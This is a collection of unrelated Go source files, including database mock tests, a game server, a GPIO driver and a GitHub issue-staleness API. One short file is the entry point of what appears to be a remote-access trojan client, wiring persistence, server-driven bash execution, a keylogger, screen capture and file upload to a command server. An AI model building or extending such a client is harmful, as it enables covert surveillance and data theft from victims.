seeker.ID, seeker.Email, seeker.FirstName,
seeker.SecondName, seeker.Password, SeekerStr, seeker.PathToImg,
).
WillReturnError(fmt.Errorf("bad query"))
repo := DBUserStorage{
DbConn: sqlxDB,
}
ok := repo.CreateSeeker(seeker)
if ok {
t.Errorf("expected false, got true")
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
}
}
func TestDBUserStorage_PutSeeker_Correct(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
seeker := SeekerReg{
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
Password: "sdfsdf",
}
id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
mock.
ExpectExec(`UPDATE persons SET`).
WithArgs(
seeker.Email, seeker.FirstName,
seeker.SecondName, seeker.Password, id,
).
WillReturnResult(sqlmock.NewResult(1, 1))
repo := DBUserStorage{
DbConn: sqlxDB,
}
ok := repo.PutSeeker(seeker, id)
if !ok {
t.Error("Failed to put seeker\n")
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
}
}
func TestDBUserStorage_PutSeeker_False(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
seeker := SeekerReg{
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
Password: "sdfsdf",
}
id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
mock.
ExpectExec(`UPDATE persons SET`).
WithArgs(
seeker.Email, seeker.FirstName,
seeker.SecondName, seeker.Password, id,
).
WillReturnError(fmt.Errorf("bad query"))
repo := DBUserStorage{
DbConn: sqlxDB,
}
ok := repo.PutSeeker(seeker, id)
if ok {
t.Errorf("expected false, got true")
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
}
}
|
/*
* Go Library (C) 2017 Inc.
*
* @project Project Globo / avaliacao.com
* @author @jeffotoni
* @size 01/03/2018
*/
package handler
import (
"github.com/jeffotoni/gmongocrud/lib/context"
//"net/http"
)
type fa func(ctx *context.Context) bool
type fn2 func(ctx *context.Context)
// Function responsible for abstraction and receive the
// authentication function and the handler that will execute if it is true
func HandlerFuncAuth(authJwt fa, handlerContext fn2) fn2 {
return func(ctx *context.Context) {
if authJwt(ctx) {
handlerContext(ctx)
} else {
HandlerError(ctx)
}
}
}
|
package controller
import (
"../basic"
"github.com/go-gl/gl/v4.1-core/gl"
"math"
"math/rand"
"github.com/lucasb-eyer/go-colorful"
)
type Controllable interface {
Update()
Draw()
}
var damping = float32(0.99)
type controller struct {
beads []*bead
beadsNum int
Controllable
}
func NewController() *controller {
beadsNum := 20
beads := make([]*bead, beadsNum)
for i := 0; i < beadsNum ; i++ {
beads[i] = NewBead(&basic.Point{X: rand.Float32()*2.0-1.0, Y: rand.Float32()}, rand.Float32()*0.1+0.05, &colorful.Color{R: 0.7, G: 0.2})
}
return &controller{beads: beads, beadsNum: beadsNum}
}
func (c *controller) AddBead(x, y float32) {
bead := NewBead(&basic.Point{X: x, Y: y}, rand.Float32()*0.1+0.05, &colorful.Color{R: 0.7, G: 0.2})
c.beads = append(c.beads, bead)
c.beadsNum += 1
}
func (c *controller) Update() {
for i := 0; i < c.beadsNum ; i++ {
c.beads[i].accelerate(0.01)
}
c.collide(false)
for i := 0; i < c.beadsNum ; i++ {
c.beads[i].borderCollide(false)
}
for i := 0; i < c.beadsNum ; i++ {
c.beads[i].inertia()
}
c.collide(true)
for i := 0; i < c.beadsNum ; i++ {
c.beads[i].borderCollide(true)
}
}
func (c *controller) collide(preserveImpulse bool) {
for i := 0; i < c.beadsNum ; i++ {
for j := i+1; j < c.beadsNum ; j++ {
b1 := c.beads[i]
b2 := c.beads[j]
dir := b2.current.Sub(b1.current)
if dir.Length() < b1.radius+b2.radius {
d := b1.radius+b2.radius - dir.Length()
v1 := b1.velocity()
v2 := b2.velocity()
b1.current = b1.current.Add(dir.Normalized().Mult(-d/2.0))
b2.current = b2.current.Add(dir.Normalized().Mult(d/2.0))
if preserveImpulse {
b1Impuls := dir.Normalized().Mult(dir.Normalized().Product(v1)).Mult(damping)
b2Impuls := dir.Normalized().Mult(dir.Normalized().Product(v2)).Mult(damping)
b1.prev = b1.current.Sub(v1.Add(b2Impuls).Sub(b1Impuls))
b2.prev = b2.current.Sub(v2.Add(b1Impuls).Sub(b2Impuls))
}
}
}
}
}
func (c *controller) Draw() {
array := make([]float32, (VertexCount*3)*7*c.beadsNum)
for j, b := range c.beads {
offset := 21*VertexCount*j
for i := 0; i < VertexCount; i++ {
theta := math.Pi * 2.0 * float64(i) / VertexCount
array[offset+(i*3)*7+0], array[offset+(i*3)*7+1], array[offset+(i*3)*7+2] = b.current.Elements()
array[offset+(i*3)*7+3], array[offset+(i*3)*7+4], array[offset+(i*3)*7+5], array[offset+(i*3)*7+6] = b.colorRGBA()
array[offset+(i*3+1)*7+0], array[offset+(i*3+1)*7+1], array[offset+(i*3+1)*7+2] = b.current.Add(
&basic.Point{
X: b.radius*float32(math.Cos(theta)),
Y: b.radius*float32(math.Sin(theta)),
}).Elements()
array[offset+(i*3+1)*7+3], array[offset+(i*3+1)*7+4], array[offset+(i*3+1)*7+5], array[offset+(i*3+1)*7+6] = b.colorRGBA()
theta2 := math.Pi * 2.0 * float64(i+1) / VertexCount
array[offset+(i*3+2)*7+0], array[offset+(i*3+2)*7+1], array[offset+(i*3+2)*7+2] = b.current.Add(
&basic.Point{
X: b.radius*float32(math.Cos(theta2)),
Y: b.radius*float32(math.Sin(theta2)),
}).Elements()
array[offset+(i*3+2)*7+3], array[offset+(i*3+2)*7+4], array[offset+(i*3+2)*7+5], array[offset+(i*3+2)*7+6] = b.colorRGBA()
}
}
VAO := makeVao(array)
gl.BindVertexArray(VAO)
for j := range c.beads {
gl.DrawArrays(gl.TRIANGLES, int32(3*7*VertexCount*j), 3*7*VertexCount)
}
}
func makeVao(array []float32) uint32 {
var vbo uint32
gl.GenBuffers(1, &vbo)
gl.BindBuffer(gl.ARRAY_BUFFER, vbo)
gl.BufferData(gl.ARRAY_BUFFER, 4*len(array), gl.Ptr(array), gl.STATIC_DRAW)
var vao uint32
gl.GenVertexArrays(1, &vao)
gl.BindVertexArray(vao)
gl.EnableVertexAttribArray(0)
gl.EnableVertexAttribArray(1)
gl.BindBuffer(gl.ARRAY_BUFFER, vbo)
gl.VertexAttribPointer(0, 3, gl.FLOAT, false, 7*4, gl.PtrOffset(0))
gl.VertexAttribPointer(1, 4, gl.FLOAT, false, 7*4, gl.PtrOffset(3*4))
return vao
}
|
package main
import (
"marauders-map-client-desktop/internal"
)
func main() {
// Deploy for persistence
// this setups home directory folder for the program
// folder strcuture & persist mechanism
watchtower := internal.Deploy()
// ===========================================================================
// Start connection and communication with server
// Subject with Observers is passed as parameter
// for processing commands
// ===========================================================================
// Creates WSClient configurations
wscconf := internal.NewWSConfiguration("ws", "localhost", "8080", "/accesspoint")
httpconf := internal.NewHTTPConfiguration("http", "localhost", "8080", "/file/upload")
// Creates WSClient
wsc := internal.NewWSClient(wscconf, httpconf)
// Initialize Observer for processing incoming
// commands from server
screenrecorder := internal.NewScreenRecorder(5)
sendFileCmd := internal.NewSendFileCommand(wsc)
respondServerCmd := internal.NewRespondServerCommand(wsc)
subject := &internal.Subject{}
subject.AddListener(internal.NewBashExecutorObserver(respondServerCmd))
subject.AddListener(internal.NewKeyloggerCmdObserver())
subject.AddListener(internal.NewScreenshotCmdObserver(screenrecorder, sendFileCmd, respondServerCmd))
subject.AddListener(internal.NewFileCmdObserver(sendFileCmd, watchtower, respondServerCmd))
// Start Communications
wsc.StartCommunications(subject)
}
|
package player
import (
"api"
"fmt"
"github.com/kataras/iris/core/errors"
pb "gos_rpc_proto"
"gosconf"
"goslib/broadcast"
"goslib/gen_server"
"goslib/logger"
"goslib/memstore"
"goslib/packet"
"goslib/session_utils"
"gslib"
"gslib/routes"
"gslib/scene_mgr"
"runtime"
"time"
)
type Player struct {
PlayerId string
Store *memstore.MemStore
Session *session_utils.Session
stream pb.RouteConnectGame_AgentStreamServer
processed int
activeTimer *time.Timer
persistTimer *time.Timer
lastActive int64
}
type RPCReply struct {
EncodeMethod string
Response interface{}
}
const EXPIRE_DURATION = 1800
var BroadcastHandler func(*Player, *broadcast.BroadcastMsg) = nil
var CurrentGameAppId string
func PlayerConnected(accountId string, stream pb.RouteConnectGame_AgentStreamServer) {
CastPlayer(accountId, "connected", stream)
}
func PlayerDisconnected(accountId string) {
CastPlayer(accountId, "disconnected")
}
func HandleRequest(accountId string, requestData []byte) {
CastPlayer(accountId, "handleRequest", requestData)
}
func HandleRPCCall(accountId string, requestData []byte) ([]byte, error) {
handler, params, err := ParseRequestData(requestData)
if err != nil {
return nil, err
}
result, err := CallPlayer(accountId, "handleRPCCall", handler, params)
if err != nil {
logger.ERR("HandleRPCCall failed: ", err)
return nil, err
}
reply := result.(*RPCReply)
return EncodeResponseData(reply.EncodeMethod, reply.Response)
}
func HandleRPCCast(accountId string, requestData []byte) {
CastPlayer(accountId, "handleRPCCast", requestData)
}
func CallPlayer(accountId string, args ...interface{}) (interface{}, error) {
if !gen_server.Exists(accountId) {
err := StartPlayer(accountId)
if err != nil {
return nil, err
}
}
return gen_server.Call(accountId, args...)
}
func CastPlayer(accountId string, args ...interface{}) {
if !gen_server.Exists(accountId) {
StartPlayer(accountId)
}
gen_server.Cast(accountId, args...)
}
/*
GenServer Callbacks
*/
func (self *Player) Init(args []interface{}) (err error) {
name := args[0].(string)
fmt.Println("Player: ", name, " started!")
self.PlayerId = name
self.Store = memstore.New(name, self)
self.lastActive = time.Now().Unix()
self.startActiveCheck()
self.startPersistTimer()
session, err := session_utils.Find(self.PlayerId)
if err != nil {
logger.ERR("Player lookup session failed: ", self.PlayerId, " err: ", err)
} else {
self.Session = session
scene_mgr.TryLoadScene(session.SceneId)
}
return nil
}
func (self *Player) startPersistTimer() {
self.persistTimer = time.AfterFunc(300*time.Second, func() {
gen_server.Cast(self.PlayerId, "PersistData")
})
}
func (self *Player) HandleCast(args []interface{}) {
method_name := args[0].(string)
if method_name == "handleRequest" {
self.handleRequest(args[1].([]byte))
} else if method_name == "handleRPCCast" {
self.handleRPCCast(args[1].([]byte))
} else if method_name == "handleWrap" {
self.handleWrap(args[1].(func(player *Player) interface{}))
} else if method_name == "handleAsyncWrap" {
self.handleAsyncWrap(args[0].(func()))
} else if method_name == "PersistData" {
self.Store.Persist([]string{"models"})
self.startPersistTimer()
} else if method_name == "removeConn" {
//self.Conn = nil
} else if method_name == "broadcast" {
self.handleBroadcast(args[1].(*broadcast.BroadcastMsg))
} else if method_name == "connected" {
self.stream = args[1].(pb.RouteConnectGame_AgentStreamServer)
} else if method_name == "disconnected" {
self.stream = nil
}
}
func (self *Player) HandleCall(args []interface{}) (interface{}, error) {
methodName := args[0].(string)
if methodName == "handleWrap" {
return self.handleWrap(args[1].(func(player *Player) interface{})), nil
} else if methodName == "handleRPCCall" {
return self.handleRPCCall(args[1].(routes.Handler), args[2])
}
return nil, nil
}
func (self *Player) Terminate(reason string) (err error) {
fmt.Println("callback Termiante!")
self.activeTimer.Stop()
self.persistTimer.Stop()
self.Store.Persist([]string{"models"})
if ok := memstore.EnsurePersisted(self.PlayerId); !ok {
return errors.New("Persist player data failed!")
}
return nil
}
func (self *Player) startActiveCheck() {
if (self.lastActive + EXPIRE_DURATION) < time.Now().Unix() {
gen_server.Stop(self.PlayerId, "Shutdown inActive player!")
} else {
self.activeTimer = time.AfterFunc(10*time.Second, self.startActiveCheck)
}
}
/*
IPC Methods
*/
func (self *Player) SystemInfo() int {
return runtime.NumCPU()
}
func (self *Player) SendData(encode_method string, msg interface{}) error {
writer, err := api.Encode(encode_method, msg)
if err != nil {
return err
}
return self.sendToClient(writer.GetSendData())
}
func (self *Player) handleRequest(data []byte) {
self.lastActive = time.Now().Unix()
if !gosconf.IS_DEBUG {
defer func() {
if x := recover(); x != nil {
logger.ERR("caught panic in player handleRequest(): ", x)
}
}()
}
handler, params, err := ParseRequestData(data)
if err != nil {
logger.ERR(err)
data, err := failMsgData("error_route_not_found")
if err == nil {
self.sendToClient(data)
}
} else {
data, err := self.processRequest(handler, params)
if err != nil {
data, err := failMsgData("error_msg_encoding_failed")
if err == nil {
self.sendToClient(data)
}
} else {
self.sendToClient(data)
}
}
}
func (self *Player) handleRPCCall(handler routes.Handler, params interface{}) (*RPCReply, error) {
encode_method, response := handler(self, params)
return &RPCReply{EncodeMethod: encode_method, Response: response}, nil
}
func (self *Player) handleRPCCast(data []byte) {
handler, params, err := ParseRequestData(data)
if err != nil {
logger.ERR("handleRPCCast failed: ", err)
return
}
self.processRequest(handler, params)
}
func ParseRequestData(data []byte) (routes.Handler, interface{}, error) {
reader := packet.Reader(data)
protocol := reader.ReadUint16()
decode_method := api.IdToName[protocol]
handler, err := routes.Route(decode_method)
logger.INFO("handelRequest: ", decode_method)
if err != nil {
return nil, nil, err
}
params, err := api.Decode(decode_method, reader)
return handler, params, err
}
func EncodeResponseData(encode_method string, response interface{}) ([]byte, error) {
writer, err := api.Encode(encode_method, response)
if err != nil {
logger.ERR("EncodeResponseData failed: ", err)
return nil, err
}
return writer.GetSendData(), nil
}
func (self *Player) processRequest(handler routes.Handler, params interface{}) ([]byte, error) {
encode_method, response := handler(self, params)
self.processed++
logger.INFO("Processed: ", self.processed, " Response Data: ", response)
return EncodeResponseData(encode_method, response)
}
func (self *Player) sendToClient(data []byte) error {
if self.stream != nil {
err := self.stream.Send(&pb.RouteMsg{
Data: data,
})
if err != nil {
logger.ERR("sendToClient failed: ", err)
return err
} else {
return nil
}
} else {
errMsg := "sendToClient failed, connectAppId is nil!"
logger.WARN(errMsg)
return errors.New(errMsg)
}
}
func (self *Player) handleWrap(fun func(ctx *Player) interface{}) interface{} {
self.lastActive = time.Now().Unix()
return fun(self)
}
func (self *Player) handleAsyncWrap(fun func()) {
self.lastActive = time.Now().Unix()
fun()
}
func (self *Player) handleBroadcast(msg *broadcast.BroadcastMsg) {
if BroadcastHandler != nil {
BroadcastHandler(self, msg)
}
}
/*
IPC Methods
*/
func (self *Player) Wrap(targetPlayerId string, fun func(ctx *Player) interface{}) (interface{}, error) {
if self.PlayerId == targetPlayerId {
return self.handleWrap(fun), nil
} else {
return CallPlayer(targetPlayerId, "handleWrap", fun)
}
}
func (self *Player) AsyncWrap(targetPlayerId string, fun func()) {
if self.PlayerId == targetPlayerId {
self.handleAsyncWrap(fun)
} else {
CastPlayer(targetPlayerId, "HandleAsyncWrap", fun)
}
}
func (self *Player) JoinChannel(channel string) {
gen_server.Cast(gslib.BROADCAST_SERVER_ID, "JoinChannel", self.PlayerId, channel)
}
func (self *Player) LeaveChannel(channel string) {
gen_server.Cast(gslib.BROADCAST_SERVER_ID, "LeaveChannel", self.PlayerId, channel)
}
func (self *Player) PublishChannelMsg(channel, category string, data interface{}) {
msg := &broadcast.BroadcastMsg{
Category: category,
Channel: channel,
SenderId: self.PlayerId,
Data: data,
}
gen_server.Cast(gslib.BROADCAST_SERVER_ID, "Publish", msg)
}
func failMsgData(errorMsg string) ([]byte, error) {
writer, err := api.Encode("Fail", &api.Fail{Fail: errorMsg})
if err != nil {
logger.ERR("Encode msg failed: ", err)
return nil, err
}
return writer.GetSendData(), nil
}
|
package kubernetes
import (
"testing"
"time"
"github.com/coredns/coredns/plugin/test"
intTest "github.com/coredns/coredns/test"
"github.com/miekg/dns"
)
var tests = []test.Case{
{
Qname: "svc-1-a.test-1.svc.cluster.local.", Qtype: dns.TypeA,
Rcode: dns.RcodeSuccess,
Answer: []dns.RR{
test.A("svc-1-a.test-1.svc.cluster.local. 303 IN A 10.96.0.100"),
},
},
}
func TestKubernetesSecureAPI(t *testing.T) {
corefile :=
`.:0 {
kubernetes cluster.local {
kubeconfig /home/circleci/.kube/kind-config-kind kind-kind
}`
server, udp, _, err := intTest.CoreDNSServerAndPorts(corefile)
if err != nil {
t.Fatalf("Could not get CoreDNS serving instance: %s", err)
}
defer server.Stop()
// Work-around for timing condition that results in no-data being returned in test environment.
time.Sleep(3 * time.Second)
for _, tc := range tests {
c := new(dns.Client)
m := tc.Msg()
res, _, err := c.Exchange(m, udp)
if err != nil {
t.Fatalf("Could not send query: %s", err)
}
if err := test.SortAndCheck(res, tc); err != nil {
t.Error(err)
}
}
}
|
package main
import (
"fmt"
"golangStudy/struct/obj/fengzhuang/account/model"
)
func main() {
account := model.NewAccount("555555", 10, "555555")
if account != nil {
fmt.Println(account)
account.SetAccontNo("555555")
account.SetPassword("555555")
account.SetBalance(50)
} else {
fmt.Println("创建失败")
}
}
|
package api
import (
"encoding/json"
"fmt"
"github.com/gorilla/mux"
"net/http"
"strconv"
"strings"
"sort"
"time"
)
func (p pointSlice) Len() int {
return len(p)
}
func (p pointSlice) Less(i, j int) bool {
return p[i].Date.Before(p[j].Date)
}
func (p pointSlice) Swap(i, j int) {
p[i], p[j] = p[j], p[i]
}
func reverse(ss []Issue) {
last := len(ss) - 1
for i := 0; i < len(ss)/2; i++ {
ss[i], ss[last-i] = ss[last-i], ss[i]
}
}
func (api *API) LoadKey(){
api.Key = api.Database.Find("key");
if(api.Key != ""){
fmt.Printf("key loaded\n");
}else{
fmt.Printf("key not loaded\n");
}
}
func (api *API) GenerateIssueChart(repoString string) (IssueChart){
var a IssueChart
var open Dataset
var closed Dataset
res := api.Database.Find("issue/" + repoString)
if(res != ""){
byteRes := []byte(res)
err := json.Unmarshal(byteRes, &a)
if err != nil {
fmt.Printf("%v", err.Error())
}
}else{
open.Label = "Open Issues"
closed.Label = "Closed Issues"
a.Name = repoString
repo := api.GetRepo(repoString)
startTime := time.Now()
for _, issue := range repo.Issues {
var openTime time.Duration
var point Point
ignore := false
for _,label := range issue.Labels{
if(label.Name == "issue/ignore"){
ignore = true
}
}
if(ignore){continue}
point.Link = issue.URL
if issue.State == "open" {
a.Open += 1
openTime = startTime.Sub(issue.Created) / time.Second
point.Label = issue.Name + " - " + strconv.Itoa(issue.Number)
point.Value = int64(openTime)
open.Points = append([]Point{point}, open.Points...)
} else {
openTime = issue.Closed.Sub(issue.Created) / time.Second
point.Label = issue.Name + " - " + strconv.Itoa(issue.Number)
point.Value = int64(openTime)
closed.Points = append([]Point{point}, closed.Points...)
a.Closed += 1
}
a.AvgDuration += openTime
if openTime > a.MaxDuration {
a.MaxDuration = openTime
}
}
a.Data = append(a.Data, open)
a.Data = append(a.Data, closed)
a.AvgDuration /= time.Duration(a.Open + a.Closed)
api.Database.Set("issue/" + repoString, a);
api.Database.Expire("issue/" + repoString, api.Database.TTL(repoString)/time.Second)
}
return a;
}
func (api *API) GenerateStaleness(repoString string) (Staleness){
a := api.GenerateIssueChart(repoString)
var stl Staleness
for _,issue := range a.Data[0].Points{
stl.Stale += issue.Value;
}
if(len(a.Data[0].Points) > 0){
stl.Stale /= int64(len(a.Data[0].Points));
}
stl.Max = int64(a.MaxDuration)
stl.Ratio = float32(stl.Stale)/float32(stl.Max)
if(stl.Ratio >= .75){
stl.Text = "Appears Stale"
}else if(stl.Ratio >= .5){
stl.Text = "Slightly stale"
}else{
stl.Text = "Active Development"
}
return stl
}
func (api *API) GetStaleHandler(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
repoString := vars["owner"] + "/" + vars["repo"]
stl := api.GenerateStaleness(repoString)
WriteJSON(w, stl)
}
func (api *API) GetBadgeHandler(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Access-Control-Allow-Origin", "*")
w.Header().Set("Cache-Control", "no-cache")
vars := mux.Vars(r)
repoString := vars["owner"] + "/" + vars["repo"]
stl := api.GenerateStaleness(repoString)
if(stl.Ratio >= .75){
http.ServeFile(w, r, "stale.svg")
}else if(stl.Ratio >= .5){
http.ServeFile(w, r, "getting_stale.svg")
}else{
http.ServeFile(w, r, "looking_good.svg")
}
}
func (api *API) GetIssueChart(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
repoString := vars["owner"] + "/" + vars["repo"]
a := api.GenerateIssueChart(repoString)
WriteJSON(w, a)
}
func (api *API) ValidHandler(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
repoString := vars["owner"] + "/" + vars["repo"]
res := api.Database.Find(repoString)
url := "https://api.github.com/repos/" + repoString
if res != "" {
WriteJSON(w, "true")
} else {
resp, err := http.Get(url)
var repo Repository
if err != nil {
fmt.Printf("%v", err.Error())
}
reader := json.NewDecoder(resp.Body)
reader.Decode(&repo)
if repo.Name != "" {
WriteJSON(w, "true")
api.GetRepo(repoString)
} else {
WriteJSON(w, "false")
}
}
}
func (api *API) GetBarChart(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
repoString := vars["owner"] + "/" + vars["repo"]
repo := api.GetRepo(repoString)
var chart pointSlice
for _, issue := range repo.Issues {
str := ""
weight := false
for _,label := range issue.Labels{
if(strings.Contains(label.Name, "burndown")){
weight = true
str = label.Name[9:len(label.Name)]
break;
}
}
var val int
val = 1
if(weight){
val,_ = strconv.Atoi(str)
}
chart = append(chart,Point{Label:strconv.Itoa(issue.Number),Value:int64(val),Date:issue.Created})
if(issue.State =="closed"){
chart = append(chart,Point{Label:strconv.Itoa(issue.Number),Value:int64(-val),Date:issue.Closed})
}
}
sort.Sort(chart);
WriteJSON(w, chart)
}
func (api *API) GetRepo(data string) Repository {
data = strings.ToLower(data)
url := "https://api.github.com/repos/" + data
_ = url
var repo Repository
res := api.Database.Find(data)
if res != "" {
byteRes := []byte(res)
err := json.Unmarshal(byteRes, &repo)
if err != nil {
fmt.Printf("%v", err.Error())
}
} else {
resp, err := http.Get(url)
if err != nil {
fmt.Printf("%v", err.Error())
}
reader := json.NewDecoder(resp.Body)
reader.Decode(&repo)
issue := url + "/issues?state=all&per_page=100"
if(api.Key != ""){
issue += "&access_token=" + api.Key
}
resp, err = http.Get(issue)
if err != nil {
fmt.Printf("%v", err.Error())
}
reader = json.NewDecoder(resp.Body)
reader.Decode(&repo.Issues)
commits := url + "/commits?state=all&per_page=100"
if(api.Key != ""){
commits += "&access_token=" + api.Key
}
resp, err = http.Get(commits)
if err != nil {
fmt.Printf("%v", err.Error())
}
reader = json.NewDecoder(resp.Body)
reader.Decode(&repo.Commits)
Pulls := url + "/pulls?state=all&per_page=100"
if(api.Key != ""){
Pulls += "&access_token=" + api.Key
}
resp, err = http.Get(Pulls)
if err != nil {
fmt.Printf("%v", err.Error())
}
reader = json.NewDecoder(resp.Body)
reader.Decode(&repo.Pulls)
api.Database.Set(data, repo)
api.Database.Expire(data, 6000)
}
return repo
}
func (api *API) GetRepoHandler(w http.ResponseWriter, r *http.Request) {
vars := mux.Vars(r)
repoString := vars["owner"] + "/" + vars["repo"]
labels := api.GetRepo(repoString)
WriteJSON(w, labels)
}
func (api *API) IndexHandler(w http.ResponseWriter, r *http.Request) {
http.ServeFile(w, r, "index.html")
}
func WriteJSON(w http.ResponseWriter, data interface{}) error {
w.Header().Set("Content-Type", "application/json")
b, err := json.MarshalIndent(data, "", " ")
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return err
}
w.Write(b)
return nil
}
|
package cmd
import (
"os"
"github.com/spf13/cobra"
)
// Create the sw command
var cmdSW = &cobra.Command{
Use: "sw [COMMAND] [ARGS]",
Short: "A tool for managing Swif workflows",
Long: `sw is a tool for managing Swif workflows.`,
}
// Execute a sw command
func Execute() {
if err := cmdSW.Execute(); err != nil {
os.Exit(-1)
}
}
|
package core
import (
"errors"
"os"
"reflect"
"syscall"
"unsafe"
"github.com/zyxar/berry/sys"
)
var (
gpio []uint32
pwm []uint32
clk []uint32
pads []uint32
timer []uint32
ErrUnknownMode = errors.New("unknown pin-mode")
ErrUnimplementedMode = errors.New("unimplemented pin-mode")
ErrInvalidValue = errors.New("invalid value")
ErrInvalidPlatform = errors.New("invalid platform")
)
func init() {
if err := setup(); err != nil {
panic(err.Error())
}
}
func setup() (err error) {
var file *os.File
if file, err = os.OpenFile(DEV_GPIO_MEM, os.O_RDWR|os.O_SYNC|os.O_EXCL, 0); os.IsNotExist(err) {
file, err = os.OpenFile(DEV_MEM, os.O_RDWR|os.O_SYNC|os.O_EXCL, 0)
}
if err != nil {
return
}
defer file.Close()
var piMemBase int64 = 0x3F000000
cpuinfo, err := sys.CPUInfo()
if err != nil {
return
}
switch cpuinfo.Hardware {
case "BCM2708":
piMemBase = 0x20000000
case "BCM2709":
piMemBase = 0x3F000000
default:
err = ErrInvalidPlatform
return
}
var (
padsMemBase int64 = piMemBase + 0x00100000
clockMemBase int64 = piMemBase + 0x00101000
gpioMemBase int64 = piMemBase + 0x00200000
timerMemBase int64 = piMemBase + 0x0000B000
pwmMemBase int64 = piMemBase + 0x0020C000
)
var mmap = func(base int64) (p []uint32, err error) {
var mem []byte
if mem, err = syscall.Mmap(
int(file.Fd()),
base,
MMAP_BLOCK_SIZE,
syscall.PROT_READ|syscall.PROT_WRITE,
syscall.MAP_SHARED); err != nil {
return
}
s := *(*reflect.SliceHeader)(unsafe.Pointer(&mem))
s.Len /= 4
s.Cap /= 4
p = *(*[]uint32)(unsafe.Pointer(&s))
return
}
if gpio, err = mmap(gpioMemBase); err != nil {
return
}
if pwm, err = mmap(pwmMemBase); err != nil {
return
}
if clk, err = mmap(clockMemBase); err != nil {
return
}
if pads, err = mmap(padsMemBase); err != nil {
return
}
timer, err = mmap(timerMemBase)
return
}
type Pin uint8
func (this Pin) Mode(m uint8) (err error) {
p := uint8(this)
var sel, shift uint8
switch m {
case INPUT, OUTPUT:
sel := p / 10
shift := (p % 10) * 3
gpio[sel] = (gpio[sel] & ^(7 << shift)) | (uint32(m) << shift)
case PULL_OFF, PULL_DOWN, PULL_UP:
sel = p/32 + 38
shift = p & 31
gpio[37] = uint32(m-PULL_OFF) & 3
DelayMicroseconds(1)
gpio[sel] = 1 << shift
DelayMicroseconds(1)
gpio[37] = 0
DelayMicroseconds(1)
gpio[sel] = 0
DelayMicroseconds(1)
case PWM_OUTPUT:
err = ErrUnimplementedMode
case GPIO_CLOCK:
err = ErrUnimplementedMode
case SOFT_PWM_OUTPUT:
err = ErrUnimplementedMode
case SOFT_TONE_OUTPUT:
err = ErrUnimplementedMode
case PWM_TONE_OUTPUT:
err = ErrUnimplementedMode
default:
err = ErrUnknownMode
}
return
}
func (this Pin) Input() error {
return this.Mode(INPUT)
}
func (this Pin) Output() error {
return this.Mode(OUTPUT)
}
func (this Pin) PullUp() error {
return this.Mode(PULL_UP)
}
func (this Pin) PullDown() error {
return this.Mode(PULL_DOWN)
}
func (this Pin) PullOff() error {
return this.Mode(PULL_OFF)
}
func (this Pin) DigitalWrite(v uint8) error {
p := uint8(this)
switch v {
case LOW:
gpio[p/32+10] = 1 << (p & 31)
case HIGH:
gpio[p/32+7] = 1 << (p & 31)
default:
return ErrInvalidValue
}
return nil
}
func (this Pin) DigitalRead() uint8 {
p := uint8(this)
if (gpio[p/32+13] & (1 << p)) != 0 {
return HIGH
}
return LOW
}
|
// Packge gdbm implements a wrapper around libgdbm, the GNU DataBase Manager
// library, for Go.
package cdb
/*
#cgo CFLAGS: -std=gnu99
#cgo LDFLAGS: -lkvdb -L.
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include "kvdb.h"
int test(void) { return 0; }
*/
import "C"
import (
"errors"
"unsafe"
"kv/db"
)
type Kvdb struct {
fd C.kvdb_t
}
/*
Simple function to open a database file with default parameters (block size
is default for the filesystem and file permissions are set to 0666).
mode is one of:
"r" - reader
"w" - writer
"c" - rw / create
"n" - new db
*/
func KvdbOpen(filename string) (db *Kvdb, err error) {
db = new(Kvdb)
cs := C.CString(filename)
defer C.free(unsafe.Pointer(cs))
db.fd = C.kvdb_open(cs)
return db, nil
}
func (db *Kvdb)Close() {
C.kvdb_close(db.fd)
}
func (db *Kvdb)Get(key uint64) (uint64, error) {
var cv C.uint64_t
ret := C.kvdb_get(db.fd, C.uint64_t(key), &cv)
if ret!=0 {
return 0, errors.New("not found")
}
return uint64(cv), nil
}
func (db *Kvdb)Put(key, value uint64) error {
ret := C.kvdb_put(db.fd, C.uint64_t(key), C.uint64_t(value))
if ret!=0 {
return errors.New("error")
}
return nil
}
func (db *Kvdb)Del(key uint64) error {
ret := C.kvdb_del(db.fd, C.uint64_t(key))
if ret!=0 {
return errors.New("error")
}
return nil
}
func (db *Kvdb)Next(sk uint64) (uint64, uint64, error) {
return 0, 0, nil
}
func (db *Kvdb)List(k1, k2 uint64, f func (uint64, uint64) bool) error {
var (
cont bool
cur C.cursor_t
k, v C.uint64_t
)
cont = true
cur = C.kvdb_open_cursor(db.fd, C.uint64_t(k1), C.uint64_t(k2))
for ;cont; {
ret := C.kvdb_get_next(db.fd, cur, &k, &v)
if ret<0 {
break
}
cont = f(uint64(k), uint64(v))
}
C.kvdb_close_cursor(db.fd, cur)
return nil
}
func cdbTest() {
var d db.DB
d, _ = KvdbOpen("test.kvdb")
d.Close()
}
|
package constants
var (
CurrentUserKey = "currentUser"
)
|
package xds
import (
"time"
mesh_proto "github.com/kumahq/kuma/api/mesh/v1alpha1"
core_mesh "github.com/kumahq/kuma/pkg/core/resources/apis/mesh"
"github.com/kumahq/kuma/pkg/core/resources/model"
core_xds "github.com/kumahq/kuma/pkg/core/xds"
"github.com/kumahq/kuma/pkg/xds/secrets"
)
var TestSecretsInfo = &secrets.Info{
Expiration: time.Unix(2, 2),
